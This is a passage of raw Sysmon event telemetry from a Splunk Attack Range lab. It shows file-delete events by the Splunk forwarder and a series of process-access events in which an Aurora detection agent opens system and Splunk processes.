Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A387203022F44713E11A4FBA697BB899,SHA256=65EFC1BC3FF55FC51DE278341AA99BF8FA2017FC730D09B6D3B261D856D1DEA6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017516Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:39.457{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E56E37369496601FC46C7E84A424A185,SHA256=D455ED2FCFF87C48C6344D4E1113861F73E48285D0EBF4EC415D2753E1E3A073,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:39.303{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE37C3FC604D503F0A140DA47A87D99A,SHA256=44C9B82EB0A93DFDF57F877BBF549BB32CB6AF417DD542891CF0EE008F3F9334,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017517Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:40.534{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D98DEA6C5D281CD141F19500C1B038F2,SHA256=284E990B59C4311D897E376EFB9F3B436F32EE9DC7BE576C2B41FB271B6F5882,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:40.385{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61CC5354446CCCFB00FF4539420291F6,SHA256=4F7194823DE43218636E2C47C8AF1766BF89B64DE4CCCD4A5B4FAAA13ADD9736,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017518Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:41.612{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4927EA6AE3448EDC45D711F2F6F22122,SHA256=D5E01BD8801BA942CAB4385E9615CC79B5FA06214ECB312F994049A892ADBA69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:41.482{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90251BDA7567BAB856A9C3B3656936BE,SHA256=898BF8BF10B347FD7229428543B1B76CCF9B424B20DFCF1E44E8032997C3BCD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:39.683{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56409-false10.0.1.12-8000- 23542300x800000000000000045038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:42.572{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=314117EF410A8E6BBEAED7498F38FEB6,SHA256=078AF12238D63995F103753B8369BB16F988FD8A238FA7A1EC9A4F57176638D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017550Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017549Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.741{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017548Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.740{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017547Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.732{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017546Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.723{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017545Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.721{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017544Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.720{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017543Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.715{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017542Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.714{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017541Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.711{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017540Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.710{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017539Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.704{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017538Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.701{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017537Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.700{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 23542300x800000000000000017536Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.690{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D855E4C3A6466237606A370AA57FF2,SHA256=0835A7979DE6E2803CB98EEF208395BE48399F6359EBBAA4175896DE41DE70D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017535Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.682{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017534Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.678{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017533Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.670{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017532Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.664{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017531Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.651{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017530Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.645{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017529Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.638{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017528Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.628{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017527Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.620{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017526Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.592{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017525Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.584{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000017524Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:42.576{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program 